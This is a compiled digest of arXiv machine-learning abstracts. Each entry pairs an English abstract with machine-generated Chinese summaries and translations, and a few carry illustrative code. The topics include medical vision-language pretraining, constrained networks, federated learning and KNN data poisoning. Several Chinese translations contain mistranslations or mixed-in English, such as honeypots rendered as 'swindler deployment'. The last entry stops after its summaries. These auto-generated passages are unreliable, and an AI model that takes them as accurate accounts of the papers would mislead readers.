    Abstract Medical vision-language models enable co-learning and integrating features from medical imaging and clinical text. However, these models are not easy to train and the latent representation space can be complex. Here we propose a novel way for pre-training and regularising medical vision-language models. The proposed method, named Medical vision-language pre-training with Frozen language models and Latent spAce Geometry optimization (M-FLAG), leverages a frozen language model for training stability and efficiency and introduces a novel orthogonality loss to harmonize the latent space geometry. We demonstrate the potential of the pre-trained model on three downstream tasks: medical image classification, segmentation, and object detection. Extensive experiments across five public datasets demonstrate that M-FLAG significantly outperforms existing medical vision-language pre-training approaches and reduces the number of parameters by 78\%. Notably, M-FLAG achieves outstanding performance on the segmentation task while using only 1\% of the RSNA dataset, even outperforming ImageNet pre-trained models that have been fine-tuned using 100\% of the data.
    摘要 医疗视语模型可以同时学习医疗影像和临床文本特征。然而,这些模型不易于训练,其潜在表示空间可能很复杂。在这里,我们提出了一种新的医疗视语预训练方法,名为医疗视语预训练with Frozen language models和Latent spAce Geometry optimization(M-FLAG)。我们利用一个冻结的语言模型来保持训练稳定和高效,并引入了一种新的正交准则来融和潜在空间准则。我们在三个下游任务中展示了预训练模型的潜力:医疗影像分类、 segmentation 和对象检测。我们在五个公共数据集进行了广泛的实验,并证明了M-FLAG在现有的医疗视语预训练方法中显著超越,并将参数数量减少了78%。特别是,M-FLAG在分割任务上表现出色,只使用了RSNA数据集的1%,甚至超过了ImageNet预训练模型,这些模型在100%的数据上进行了精细调节。
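
The latent-space geometry idea can be illustrated with a generic orthogonality penalty in PyTorch: push the Gram matrix of (normalised) latent dimensions toward the identity. The exact form of M-FLAG's loss is defined in the paper and repository; this is only a hedged sketch of the general technique.

```python
# pip install torch
import torch

def orthogonality_loss(z):
    """Generic orthogonality penalty on a batch of latent vectors: push the
    Gram matrix of (batch-normalised) latent dimensions toward the identity."""
    z = torch.nn.functional.normalize(z, dim=0)   # unit-norm each latent dimension over the batch
    gram = z.T @ z                                # (d, d) similarity between latent dimensions
    eye = torch.eye(gram.shape[0], device=z.device)
    return ((gram - eye) ** 2).mean()

z = torch.randn(32, 128, requires_grad=True)      # batch of 32 latent vectors of size 128
loss = orthogonality_loss(z)
loss.backward()                                   # gradients flow back to the encoder in practice
print(float(loss), z.grad.shape)
```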

Efficient selective attention LSTM for well log curve synthesis

  • paper_url: http://arxiv.org/abs/2307.10253
  • repo_url: None
  • paper_authors: Yuankai Zhou, Huanyu Li, Hu liu
  • for: 这 paper 是为了提出一种机器学习方法,用于预测缺失的井 logging 曲线。
  • methods: 该方法基于传统的 Long Short-Term Memory (LSTM) 神经网络,并添加了一个自注意机制来分析数据的空间相关性。
  • results: 实验结果表明,该方法可以高效地预测缺失的井 logging 曲线,并且比传统的 Fully Connected Neural Networks (FCNN) 和 LSTM 方法更高精度。
    Abstract Non-core drilling has gradually become the primary exploration method in geological engineering, and well logging curves have increasingly gained importance as the main carriers of geological information. However, factors such as geological environment, logging equipment, borehole quality, and unexpected events can all impact the quality of well logging curves. Previous methods of re-logging or manual corrections have been associated with high costs and low efficiency. This paper proposes a machine learning method that utilizes existing data to predict missing well logging curves, and its effectiveness and feasibility have been validated through experiments. The proposed method builds upon the traditional Long Short-Term Memory (LSTM) neural network by incorporating a self-attention mechanism to analyze the spatial dependencies of the data. It selectively includes the dominant computational results in the LSTM, reducing the computational complexity from O(n^2) to O(nlogn) and improving model efficiency. Experimental results demonstrate that the proposed method achieves higher accuracy compared to traditional curve synthesis methods based on Fully Connected Neural Networks (FCNN) and LSTM. This accurate, efficient, and cost-effective prediction method holds practical value in engineering applications.
    摘要 非核心钻探逐渐成为地质工程的主要探测方法,而井 logging 曲线也逐渐成为主要的地质信息传递者。然而,地质环境、钻探设备、井井质量和意外事件等因素都会影响井 logging 曲线的质量。过去的重新采样或手动修正方法均具有高成本和低效率。这篇论文提出了一种使用现有数据预测缺失井 logging 曲线的机器学习方法,并通过实验证明其效果和可行性。该方法基于传统的 Long Short-Term Memory (LSTM) 神经网络,并在该网络中添加了自注意机制来分析数据的空间相关性。它选择性地包含 LSTM 中的主导计算结果,从而将计算复杂性从 O(n^2) 降低到 O(nlogn),提高模型效率。实验结果表明,提议的方法与基于 Fully Connected Neural Networks (FCNN) 和 LSTM 的传统曲线合成方法相比,具有更高的准确率。这种准确、有效、Cost-effective 的预测方法在工程应用中具有实际价值。

Gaussian processes for Bayesian inverse problems associated with linear partial differential equations

  • paper_url: http://arxiv.org/abs/2307.08343
  • repo_url: None
  • paper_authors: Tianming Bai, Aretha L. Teckentrup, Konstantinos C. Zygalakis
  • for: 该论文关注使用 Gaussian 代理模型求解与线性偏微分方程相关的贝叶斯反问题,特别是在训练数据很少的情形下。
  • methods: 作者扩展了 Raissi et al. (2017) 的框架,构建 PDE-informed Gaussian 先验,并据此构建不同的近似后验。
  • results: 数值实验表明,PDE-informed Gaussian 先验的性能优于更传统的先验。
    Abstract This work is concerned with the use of Gaussian surrogate models for Bayesian inverse problems associated with linear partial differential equations. A particular focus is on the regime where only a small amount of training data is available. In this regime the type of Gaussian prior used is of critical importance with respect to how well the surrogate model will perform in terms of Bayesian inversion. We extend the framework of Raissi et. al. (2017) to construct PDE-informed Gaussian priors that we then use to construct different approximate posteriors. A number of different numerical experiments illustrate the superiority of the PDE-informed Gaussian priors over more traditional priors.
    摘要 本工作关注使用 Gaussian 代理模型求解与线性偏微分方程相关的贝叶斯反问题,并特别关注训练数据很少的情形。在这一情形下,所采用的 Gaussian 先验类型对代理模型在贝叶斯反演中的表现至关重要。我们扩展了 Raissi et al. (2017) 的框架来构建 PDE-informed Gaussian 先验,并据此构建不同的近似后验。一系列数值实验表明,PDE-informed Gaussian 先验优于更传统的先验。

RAYEN: Imposition of Hard Convex Constraints on Neural Networks

  • paper_url: http://arxiv.org/abs/2307.08336
  • repo_url: https://github.com/leggedrobotics/rayen
  • paper_authors: Jesus Tordesillas, Jonathan P. How, Marco Hutter
  • for: 这个论文是用来实现神经网络中的硬 convex 约束的框架,保证任何输入或者神经网络的参数,约束都会被满足。
  • methods: 这个框架使用了一些新的技术,例如不需要计算量占用的正交投影步骤、不需要软约束(不能保证约束在测试时都会被满足)、不需要保守的近似约束集和不需要慢速的内部梯度下降来保证约束。
  • results: 使用这个框架,可以很快地(比如1Kquadratic约束在1000维变量上的 overhead低于8ms,300x300稠密矩阵LMI约束在10000维变量上的 overhead低于12ms)进行约束优化问题的解决,而且可以保证约束的满足,计算时间比状态艺术算法快,计算结果几乎与最优解一致。
    Abstract This paper presents RAYEN, a framework to impose hard convex constraints on the output or latent variable of a neural network. RAYEN guarantees that, for any input or any weights of the network, the constraints are satisfied at all times. Compared to other approaches, RAYEN does not perform a computationally-expensive orthogonal projection step onto the feasible set, does not rely on soft constraints (which do not guarantee the satisfaction of the constraints at test time), does not use conservative approximations of the feasible set, and does not perform a potentially slow inner gradient descent correction to enforce the constraints. RAYEN supports any combination of linear, convex quadratic, second-order cone (SOC), and linear matrix inequality (LMI) constraints, achieving a very small computational overhead compared to unconstrained networks. For example, it is able to impose 1K quadratic constraints on a 1K-dimensional variable with an overhead of less than 8 ms, and an LMI constraint with 300x300 dense matrices on a 10K-dimensional variable in less than 12 ms. When used in neural networks that approximate the solution of constrained optimization problems, RAYEN achieves computation times between 20 and 7468 times faster than state-of-the-art algorithms, while guaranteeing the satisfaction of the constraints at all times and obtaining a cost very close to the optimal one.
    摘要 本文提出了 RAYEN,一个可对神经网络的输出或隐变量施加硬性凸约束的框架,可保证对任意输入和任意网络权重,约束在任何时刻都得到满足。与其他方法相比,RAYEN 不需要进行计算代价高昂的向可行集的正交投影,不依赖软约束(软约束无法保证测试时约束被满足),不使用可行集的保守近似,也不需要可能很慢的内部梯度下降修正来强制约束。RAYEN 支持线性、凸二次、二阶锥(SOC)和线性矩阵不等式(LMI)约束的任意组合,相比无约束网络的计算开销非常小:例如,对1000维变量施加1000个二次约束的开销低于8毫秒,对10000维变量施加300x300稠密矩阵的LMI约束的开销低于12毫秒。当用于近似求解约束优化问题的神经网络时,RAYEN 的计算时间比最新算法快20到7468倍,同时始终保证约束满足,且所得代价非常接近最优值。
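
A minimal numpy illustration of the core idea for linear inequality constraints only: scale the ray from a known strictly feasible interior point toward the raw network output just enough that the constraints hold, so feasibility is guaranteed for any output. The actual framework also handles quadratic, SOC and LMI constraints and is implemented as a differentiable layer.

```python
import numpy as np

def project_along_ray(v, A, b, x0):
    """Scale the ray from an interior point x0 toward the raw output v just
    enough that A x <= b holds -- feasibility is guaranteed for any v."""
    d = v - x0
    Ad = A @ d
    slack = b - A @ x0                 # > 0 because x0 is strictly feasible
    with np.errstate(divide="ignore"):
        limits = np.where(Ad > 0, slack / Ad, np.inf)
    lam = min(1.0, limits.min())
    return x0 + lam * d

# Feasible set: the box -1 <= x_i <= 1 written as A x <= b.
A = np.vstack([np.eye(2), -np.eye(2)])
b = np.ones(4)
x0 = np.zeros(2)                       # strictly interior point

raw_output = np.array([3.0, -0.5])     # unconstrained network output
x = project_along_ray(raw_output, A, b, x0)
print(x, "feasible:", np.all(A @ x <= b + 1e-9))
```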

A Machine Learning based Empirical Evaluation of Cyber Threat Actors High Level Attack Patterns over Low level Attack Patterns in Attributing Attacks

  • paper_url: http://arxiv.org/abs/2307.10252
  • repo_url: None
  • paper_authors: Umara Noor, Sawera Shahid, Rimsha Kanwal, Zahid Rashid
  • for: 这篇论文旨在探讨网络威胁溯源(cyber threat attribution)问题,即在网络空间中识别攻击事件实施者的过程。
  • methods: 论文比较了高层次攻击指标与低层次攻击指标(IOC),后者通常由安全分析师对蜜罐部署、入侵检测系统、防火墙和回溯(trace-back)过程收集的攻击模式进行人工分析得到。
  • results: 实验结果显示,基于高层次指标训练的模型可以以95%的准确率进行攻击溯源,而基于低层次指标训练的模型的准确率只有40%。
    Abstract Cyber threat attribution is the process of identifying the actor of an attack incident in cyberspace. An accurate and timely threat attribution plays an important role in deterring future attacks by applying appropriate and timely defense mechanisms. Manual analysis of attack patterns gathered by honeypot deployments, intrusion detection systems, firewalls, and via trace-back procedures is still the preferred method of security analysts for cyber threat attribution. Such attack patterns are low-level Indicators of Compromise (IOC). They represent Tactics, Techniques, Procedures (TTP), and software tools used by the adversaries in their campaigns. The adversaries rarely re-use them. They can also be manipulated, resulting in false and unfair attribution. To empirically evaluate and compare the effectiveness of both kinds of IOC, there are two problems that need to be addressed. The first problem is that in recent research works, the ineffectiveness of low-level IOC for cyber threat attribution has been discussed intuitively. An empirical evaluation for the measure of the effectiveness of low-level IOC based on a real-world dataset is missing. The second problem is that the available dataset for high-level IOC has a single instance for each predictive class label that cannot be used directly for training machine learning models. To address these problems in this research work, we empirically evaluate the effectiveness of low-level IOC based on a real-world dataset that is specifically built for comparative analysis with high-level IOC. The experimental results show that the high-level IOC trained models effectively attribute cyberattacks with an accuracy of 95% as compared to the low-level IOC trained models where accuracy is 40%.
    摘要 “网络威胁识别是指在网络空间中识别攻击事件的具体执行者。正确和及时的威胁识别对于防止未来攻击提供了重要的防御机制。现今,安全分析师仍然采用手动分析攻击模式,包括骗子部署、入侵检测系统、防火墙等,以及跟踪返回过程,进行威胁识别。这些攻击模式被称为低级别征识(Indicators of Compromise,IOC)。它们表示敌对者在其攻击活动中使用的策略、技术、程序(Tactics, Techniques, Procedures,TTP)和软件工具。敌对者很少重复使用这些攻击模式,它们也可以被修改,导致假的和不公正的威胁识别。为了empirically评估和比较低级别征识和高级别征识的效果,这些问题需要被解决。第一个问题是,在当前的研究中,低级别征识的效果不够有效性已经被直观提出。empirical评估基于实际数据集的低级别征识效果缺失。第二个问题是,可用的高级别征识数据集中每个预测类别的单个实例不能直接用于机器学习模型训练。为解决这些问题,我们在这项研究中Empirically评估了低级别征识的效果,并使用特定 для比较分析的实际数据集。实验结果显示,高级别征识训练模型可以准确地归类攻击事件,准确率达95%,而低级别征识训练模型的准确率只有40%。”

Analyzing the Impact of Adversarial Examples on Explainable Machine Learning

  • paper_url: http://arxiv.org/abs/2307.08327
  • repo_url: None
  • paper_authors: Prathyusha Devabhakthini, Sasmita Parida, Raj Mani Shukla, Suvendu Chandan Nayak
  • for: 这篇论文探讨了深度学习模型在对抗攻击下的脆弱性,以及对抗样本对模型可解释性的影响。
  • methods: 作者构建了一个基于机器学习的文本分类模型,然后对文本数据引入对抗扰动,以考察攻击后模型的分类性能。
  • results: 研究发现,对抗攻击可以轻易地使模型做出错误预测;作者还对攻击前后的模型可解释性进行了分析和解读。
    Abstract Adversarial attacks are a type of attack on machine learning models where an attacker deliberately modifies the inputs to cause the model to make incorrect predictions. Adversarial attacks can have serious consequences, particularly in applications such as autonomous vehicles, medical diagnosis, and security systems. Work on the vulnerability of deep learning models to adversarial attacks has shown that it is very easy to make samples that make a model predict things that it doesn't want to. In this work, we analyze the impact of model interpretability due to adversarial attacks on text classification problems. We develop an ML-based classification model for text data. Then, we introduce the adversarial perturbations on the text data to understand the classification performance after the attack. Subsequently, we analyze and interpret the model's explainability before and after the attack
    摘要 adversarial 攻击是一种针对机器学习模型的攻击,攻击者故意修改输入,以让模型作出错误预测。 adversarial 攻击可能会有严重的后果,特别是在自动驾驶、医疗诊断和安全系统等应用中。我们在深度学习模型对 adversarial 攻击的抵触性上进行了研究。我们开发了一个基于 ML 的文本数据分类模型,然后引入了对文本数据的 adversarial 偏移,以了解攻击后分类性能。接着,我们分析和解释模型在攻击后的解释性。

A Secure Aggregation for Federated Learning on Long-Tailed Data

  • paper_url: http://arxiv.org/abs/2307.08324
  • repo_url: None
  • paper_authors: Yanna Jiang, Baihe Ma, Xu Wang, Guangsheng Yu, Caijun Sun, Wei Ni, Ren Ping Liu
  • for: 本研究针对 Federated Learning (FL) 面临的两大挑战:数据分布不均和模型攻击。
  • methods: 提出了一种新的两层聚合方法,可以拒绝恶意模型,并合理地选择包含尾部类别数据信息的有价值模型,从而提升聚合的鲁棒性。
  • results: 实验表明,思想团(think tank)可以有效地选择模型进行全局聚合。
    Abstract As a distributed learning, Federated Learning (FL) faces two challenges: the unbalanced distribution of training data among participants, and the model attack by Byzantine nodes. In this paper, we consider the long-tailed distribution with the presence of Byzantine nodes in the FL scenario. A novel two-layer aggregation method is proposed for the rejection of malicious models and the advisable selection of valuable models containing tail class data information. We introduce the concept of think tank to leverage the wisdom of all participants. Preliminary experiments validate that the think tank can make effective model selections for global aggregation.
    摘要 作为一种分布式学习形式,联邦学习(Federated Learning,FL)面临两大挑战:训练数据在参与者之间的不均衡分布,以及拜占庭节点发起的模型攻击。在本文中,我们研究了 FL 场景下数据呈长尾分布且存在拜占庭节点的情形。我们提出了一种新的两层聚合方法,用于拒绝恶意模型,并有针对性地选择包含尾部类别数据信息的有价值模型。我们还引入了"智囊团"(think tank)的概念,以汇聚所有参与者的智慧。初步实验表明,智囊团能够有效地为全局聚合选择模型。
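
The paper's "think tank" selection is more elaborate than what follows; the snippet below is only an illustrative stand-in for a two-stage aggregation, assuming a simple median-distance filter for Byzantine updates followed by distance-weighted averaging.

```python
# Illustrative sketch only: stage 1 rejects updates far from the coordinate-wise
# median (assumed malicious); stage 2 averages the survivors with inverse-distance
# weights. Not the paper's actual selection mechanism.
import numpy as np

def two_stage_aggregate(updates: np.ndarray, reject_frac: float = 0.2) -> np.ndarray:
    """updates: (n_clients, n_params) array of model deltas."""
    median = np.median(updates, axis=0)
    dist = np.linalg.norm(updates - median, axis=1)
    keep = np.argsort(dist)[: int(len(updates) * (1 - reject_frac))]   # stage 1
    w = 1.0 / (dist[keep] + 1e-8)                                      # stage 2
    return (updates[keep] * w[:, None]).sum(axis=0) / w.sum()

rng = np.random.default_rng(0)
honest = rng.normal(0.0, 0.1, size=(8, 5))
byzantine = rng.normal(5.0, 0.1, size=(2, 5))          # poisoned updates
agg = two_stage_aggregate(np.vstack([honest, byzantine]))
print("aggregated update:", np.round(agg, 3))
```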

Airway Label Prediction in Video Bronchoscopy: Capturing Temporal Dependencies Utilizing Anatomical Knowledge

  • paper_url: http://arxiv.org/abs/2307.08318
  • repo_url: None
  • paper_authors: Ron Keuth, Mattias Heinrich, Martin Eichenlaub, Marian Himstedt
  • For: This paper provides a novel approach for navigation guidance during bronchoscopy interventions without the need for electromagnetic tracking or patient-specific CT scans.* Methods: The proposed approach uses topological bronchoscope localization and incorporates sequences of CNN-based airway likelihoods into a Hidden Markov Model, leveraging anatomical constraints and temporal context for improved accuracy.* Results: The approach is evaluated in a lung phantom model and achieves an accuracy of up to 0.98 compared to 0.81 for a classification based on individual frames, demonstrating the effectiveness of the proposed method.
    Abstract Purpose: Navigation guidance is a key requirement for a multitude of lung interventions using video bronchoscopy. State-of-the-art solutions focus on lung biopsies using electromagnetic tracking and intraoperative image registration w.r.t. preoperative CT scans for guidance. The requirement of patient-specific CT scans hampers the utilisation of navigation guidance for other applications such as intensive care units. Methods: This paper addresses navigation guidance solely incorporating bronchosopy video data. In contrast to state-of-the-art approaches we entirely omit the use of electromagnetic tracking and patient-specific CT scans. Guidance is enabled by means of topological bronchoscope localization w.r.t. an interpatient airway model. Particularly, we take maximally advantage of anatomical constraints of airway trees being sequentially traversed. This is realized by incorporating sequences of CNN-based airway likelihoods into a Hidden Markov Model. Results: Our approach is evaluated based on multiple experiments inside a lung phantom model. With the consideration of temporal context and use of anatomical knowledge for regularization, we are able to improve the accuracy up to to 0.98 compared to 0.81 (weighted F1: 0.98 compared to 0.81) for a classification based on individual frames. Conclusion: We combine CNN-based single image classification of airway segments with anatomical constraints and temporal HMM-based inference for the first time. Our approach renders vision-only guidance for bronchoscopy interventions in the absence of electromagnetic tracking and patient-specific CT scans possible.
    摘要 目的:导航引导是支气管镜视频引导下多种肺部介入操作的关键需求。现有最先进的方案主要面向肺活检,依靠电磁跟踪以及术中图像与术前 CT 扫描的配准来实现引导。对患者专属 CT 扫描的依赖限制了导航引导在重症监护等其他场景中的应用。方法:本文提出一种仅利用支气管镜视频数据实现导航引导的方法。与现有方法不同,我们完全不使用电磁跟踪和患者专属 CT 扫描,而是基于一个跨患者的气道模型对支气管镜进行拓扑定位。特别地,我们充分利用气道树按顺序被穿行这一解剖学约束,将基于 CNN 的气道似然序列整合进隐马尔可夫模型(HMM)。结果:我们在肺部体模上进行了多组实验。在引入时间上下文并利用解剖学知识进行正则化后,准确率从基于单帧分类的 0.81 提升到 0.98(加权 F1:从 0.81 提升到 0.98)。结论:我们首次将基于 CNN 的气道段单帧分类与解剖学约束及基于 HMM 的时间推断相结合,使得在没有电磁跟踪和患者专属 CT 扫描的情况下,仅凭视觉即可为支气管镜介入提供引导。
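
A hedged sketch of the temporal-smoothing step described above: a Viterbi decoder over per-frame class likelihoods whose transitions only allow anatomically adjacent airway segments. The toy airway "graph" and the CNN-like likelihoods below are made up; only the decoding logic is meaningful.

```python
import numpy as np

def viterbi(log_lik: np.ndarray, log_trans: np.ndarray) -> np.ndarray:
    """log_lik: (T, S) per-frame log-likelihoods; log_trans: (S, S) transition log-probs."""
    T, S = log_lik.shape
    delta = np.full((T, S), -np.inf)
    back = np.zeros((T, S), dtype=int)
    delta[0] = log_lik[0]
    for t in range(1, T):
        scores = delta[t - 1][:, None] + log_trans          # (S, S)
        back[t] = scores.argmax(axis=0)
        delta[t] = scores.max(axis=0) + log_lik[t]
    path = np.zeros(T, dtype=int)
    path[-1] = delta[-1].argmax()
    for t in range(T - 2, -1, -1):
        path[t] = back[t + 1, path[t + 1]]
    return path

# Toy "airway tree": segment i connects to itself and to i±1 (anatomical constraint).
S, T = 5, 12
adj = np.eye(S) + np.eye(S, k=1) + np.eye(S, k=-1)
log_trans = np.where(adj > 0, np.log(adj / adj.sum(1, keepdims=True) + 1e-12), -np.inf)

rng = np.random.default_rng(0)
true_path = np.clip(np.arange(T) // 3, 0, S - 1)             # slow sequential traversal
log_lik = np.log(np.full((T, S), 0.1))
log_lik[np.arange(T), true_path] = np.log(0.6)
log_lik += rng.normal(0, 0.2, size=(T, S))                    # noisy "CNN" scores
print("decoded segment sequence:", viterbi(log_lik, log_trans))
```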

Soft Prompt Tuning for Augmenting Dense Retrieval with Large Language Models

  • paper_url: http://arxiv.org/abs/2307.08303
  • repo_url: https://github.com/zhiyuanpeng/sptar
  • paper_authors: Zhiyuan Peng, Xuyang Wu, Yi Fang
  • for: 提高 dense retrieval 模型的性能,尤其是在缺乏领域特定训练数据的情况下。
  • methods: 使用 soft prompt tuning 方法,通过优化任务特定的软提示来提高 LLMs 生成的弱查询语句质量,然后使用这些弱查询语句来训练任务特定的 dense retriever。
  • results: SPTAR 方法优于无监督基线 BM25 以及基于 LLMs 的数据增强方法,能够提升 dense retrieval 模型的检索效果。
    Abstract Dense retrieval (DR) converts queries and documents into dense embeddings and measures the similarity between queries and documents in vector space. One of the challenges in DR is the lack of domain-specific training data. While DR models can learn from large-scale public datasets like MS MARCO through transfer learning, evidence shows that not all DR models and domains can benefit from transfer learning equally. Recently, some researchers have resorted to large language models (LLMs) to improve the zero-shot and few-shot DR models. However, the hard prompts or human-written prompts utilized in these works cannot guarantee the good quality of generated weak queries. To tackle this, we propose soft prompt tuning for augmenting DR (SPTAR): For each task, we leverage soft prompt-tuning to optimize a task-specific soft prompt on limited ground truth data and then prompt the LLMs to tag unlabeled documents with weak queries, yielding enough weak document-query pairs to train task-specific dense retrievers. We design a filter to select high-quality example document-query pairs in the prompt to further improve the quality of weak tagged queries. To the best of our knowledge, there is no prior work utilizing soft prompt tuning to augment DR models. The experiments demonstrate that SPTAR outperforms the unsupervised baselines BM25 and the recently proposed LLMs-based augmentation method for DR.
    摘要 密集检索(Dense Retrieval,DR)将查询和文档转换为稠密向量表示,并在向量空间中度量二者的相似性。DR 面临的一个挑战是缺乏领域特定的训练数据。尽管 DR 模型可以通过迁移学习从 MS MARCO 等大规模公共数据集中学习,但已有证据表明并非所有 DR 模型和领域都能同等地从迁移学习中受益。近来,一些研究者借助大语言模型(LLMs)来改进零样本和少样本 DR 模型,然而这些工作使用的硬提示或人工编写的提示无法保证所生成弱查询的质量。为此,我们提出了用于增强 DR 的软提示调优方法(SPTAR):对每个任务,我们在少量标注数据上通过软提示调优得到任务特定的软提示,再利用 LLMs 为无标注文档生成弱查询标签,从而获得足够的弱文档-查询对来训练任务特定的密集检索器。我们还设计了一个筛选器来挑选提示中高质量的示例文档-查询对,以进一步提高弱查询的质量。据我们所知,此前尚无利用软提示调优来增强 DR 模型的工作。实验表明,SPTAR 优于无监督基线 BM25 以及近期提出的基于 LLMs 的增强方法。
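
A minimal PyTorch sketch of the soft-prompt-tuning idea (illustrative, not the SPTAR code): learnable prompt vectors are prepended to a frozen model's input embeddings and are the only trainable parameters. The `SoftPrompt` class, dimensions, and the stand-in embedding layer are all assumptions for this example.

```python
import torch
import torch.nn as nn

class SoftPrompt(nn.Module):
    def __init__(self, prompt_len: int, embed_dim: int):
        super().__init__()
        self.prompt = nn.Parameter(torch.randn(prompt_len, embed_dim) * 0.02)

    def forward(self, token_embeds: torch.Tensor) -> torch.Tensor:
        # token_embeds: (batch, seq_len, embed_dim)
        batch = token_embeds.size(0)
        prompt = self.prompt.unsqueeze(0).expand(batch, -1, -1)
        return torch.cat([prompt, token_embeds], dim=1)

embed_dim, vocab = 32, 100
frozen_embedding = nn.Embedding(vocab, embed_dim)        # stands in for the LLM's embeddings
frozen_embedding.requires_grad_(False)
soft_prompt = SoftPrompt(prompt_len=8, embed_dim=embed_dim)

tokens = torch.randint(0, vocab, (4, 16))
inputs = soft_prompt(frozen_embedding(tokens))             # (4, 8 + 16, 32)
loss = inputs.pow(2).mean()                                # placeholder objective
loss.backward()                                            # gradients flow only into the prompt
print(inputs.shape, soft_prompt.prompt.grad is not None)
```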

GBT: Two-stage transformer framework for non-stationary time series forecasting

  • paper_url: http://arxiv.org/abs/2307.08302
  • repo_url: https://github.com/origamisl/gbt
  • paper_authors: Li Shen, Yuning Wei, Yangzhu Wang
  • for: 本研究旨在解决时间序列预测变换器(TSFT)的严重过拟合问题,尤其是在处理非平稳时间序列时。
  • methods: 我们提出了一种新的两阶段变换器框架,称为Good Beginning Transformer(GBT),它将TSFT的预测过程分解成两个阶段:自动回归阶段和自我回归阶段。在自动回归阶段,预测结果作为一个更好的初始化方法,并在自我回归阶段进行进一步的预测。
  • results: 我们在七个基准数据集上进行了广泛的实验,结果显示GBT在预测能力方面超过了现有的TSFT和其他预测模型(SCINet、N-HiTS等),并且具有较低的时间和空间复杂度。GBT还可以与这些模型结合使用,以增强其预测能力。
    Abstract This paper shows that time series forecasting Transformer (TSFT) suffers from severe over-fitting problem caused by improper initialization method of unknown decoder inputs, esp. when handling non-stationary time series. Based on this observation, we propose GBT, a novel two-stage Transformer framework with Good Beginning. It decouples the prediction process of TSFT into two stages, including Auto-Regression stage and Self-Regression stage to tackle the problem of different statistical properties between input and prediction sequences.Prediction results of Auto-Regression stage serve as a Good Beginning, i.e., a better initialization for inputs of Self-Regression stage. We also propose Error Score Modification module to further enhance the forecasting capability of the Self-Regression stage in GBT. Extensive experiments on seven benchmark datasets demonstrate that GBT outperforms SOTA TSFTs (FEDformer, Pyraformer, ETSformer, etc.) and many other forecasting models (SCINet, N-HiTS, etc.) with only canonical attention and convolution while owning less time and space complexity. It is also general enough to couple with these models to strengthen their forecasting capability. The source code is available at: https://github.com/OrigamiSL/GBT
    摘要 本文指出,时间序列预测 Transformer(TSFT)由于未知解码器输入的初始化方式不当,尤其在处理非平稳时间序列时,存在严重的过拟合问题。基于这一观察,我们提出了 GBT——一种带有"良好开端"(Good Beginning)的两阶段 Transformer 框架。它将 TSFT 的预测过程解耦为自回归(Auto-Regression)和自我回归(Self-Regression)两个阶段,以应对输入序列与预测序列统计特性不同的问题:自回归阶段的预测结果作为"良好开端",为自我回归阶段的输入提供更好的初始化。我们还提出了误差分数修正(Error Score Modification)模块,以进一步增强自我回归阶段的预测能力。在七个基准数据集上的大量实验表明,GBT 仅使用标准注意力和卷积就超越了 FEDformer、Pyraformer、ETSformer 等最新 TSFT 以及 SCINet、N-HiTS 等其他预测模型,同时具有更低的时间和空间复杂度,并且足够通用,可与这些模型结合以增强其预测能力。源代码见 https://github.com/OrigamiSL/GBT。

Systematic Testing of the Data-Poisoning Robustness of KNN

  • paper_url: http://arxiv.org/abs/2307.08288
  • repo_url: None
  • paper_authors: Yannan Li, Jingbo Wang, Chao Wang
  • for: 这篇论文旨在检验基于训练集的机器学习软件组件对数据投毒攻击的鲁棒性。
  • methods: 论文提出了一种基于系统化测试的方法,既能认证也能证伪数据投毒鲁棒性。
  • results: 该方法比基线枚举方法更快、更准确:先通过抽象域中的过近似分析快速缩小搜索空间,再通过具体域中的系统化测试找到真实的违例。测试结果表明,该方法能够有效判定 k-近邻(KNN)预测结果的数据投毒鲁棒性。
    Abstract Data poisoning aims to compromise a machine learning based software component by contaminating its training set to change its prediction results for test inputs. Existing methods for deciding data-poisoning robustness have either poor accuracy or long running time and, more importantly, they can only certify some of the truly-robust cases, but remain inconclusive when certification fails. In other words, they cannot falsify the truly-non-robust cases. To overcome this limitation, we propose a systematic testing based method, which can falsify as well as certify data-poisoning robustness for a widely used supervised-learning technique named k-nearest neighbors (KNN). Our method is faster and more accurate than the baseline enumeration method, due to a novel over-approximate analysis in the abstract domain, to quickly narrow down the search space, and systematic testing in the concrete domain, to find the actual violations. We have evaluated our method on a set of supervised-learning datasets. Our results show that the method significantly outperforms state-of-the-art techniques, and can decide data-poisoning robustness of KNN prediction results for most of the test inputs.
    摘要 数据投毒攻击旨在通过污染训练集来破坏基于机器学习的软件组件,使其对测试输入给出错误的预测结果。现有判定数据投毒鲁棒性的方法要么精度不足,要么运行时间过长,更重要的是,它们只能认证部分真正鲁棒的情形,在认证失败时无法给出结论,也就是说无法证伪真正不鲁棒的情形。为克服这一局限,我们提出了一种基于系统化测试的方法,能够对广泛使用的监督学习技术 k-近邻(KNN)既认证又证伪其数据投毒鲁棒性。我们的方法比基线枚举方法更快、更准确:一方面利用抽象域中新颖的过近似分析快速缩小搜索空间,另一方面通过具体域中的系统化测试找到真实的违例。我们在一组监督学习数据集上进行了评估,结果表明,该方法显著优于现有技术,并能对绝大多数测试输入判定 KNN 预测结果的数据投毒鲁棒性。
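
For orientation, the snippet below sketches the baseline enumeration check that the paper improves on (the paper scales this up via abstraction plus systematic testing): can removing any single, possibly poisoned, training point flip a 3-NN prediction? The data here is synthetic.

```python
import numpy as np
from collections import Counter

def knn_predict(X, y, x, k=3):
    idx = np.argsort(np.linalg.norm(X - x, axis=1))[:k]
    return Counter(y[idx]).most_common(1)[0][0]

def robust_to_one_removal(X, y, x, k=3):
    base = knn_predict(X, y, x, k)
    for i in range(len(X)):                      # enumerate all single-point removals
        Xi, yi = np.delete(X, i, axis=0), np.delete(y, i)
        if knn_predict(Xi, yi, x, k) != base:
            return False, i                      # found a falsifying removal
    return True, None

rng = np.random.default_rng(0)
X = np.vstack([rng.normal(0, 1, (20, 2)), rng.normal(3, 1, (20, 2))])
y = np.array([0] * 20 + [1] * 20)
print(robust_to_one_removal(X, y, np.array([1.5, 1.5])))
```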

Going Beyond Linear Mode Connectivity: The Layerwise Linear Feature Connectivity

  • paper_url: http://arxiv.org/abs/2307.08286
  • repo_url: None
  • paper_authors: Zhanpeng Zhou, Yongyi Yang, Xiaojiang Yang, Junchi Yan, Wei Hu
  • for: 本研究探讨了神经网络训练过程中的一些有趣实验现象,包括Linear Mode Connectivity(LMC)等。
  • methods: 本研究使用了多种方法来探讨LMC和Layerwise Linear Feature Connectivity(LLFC)的现象,包括随机排序和生成新的网络等。
  • results: 研究发现,当两个训练过的网络满足LMC时,它们通常也满足LLFC在大多数层次。此外,研究还探讨了LLFC的下面因素,提供了新的思路和技术来理解LMC和LLFC。
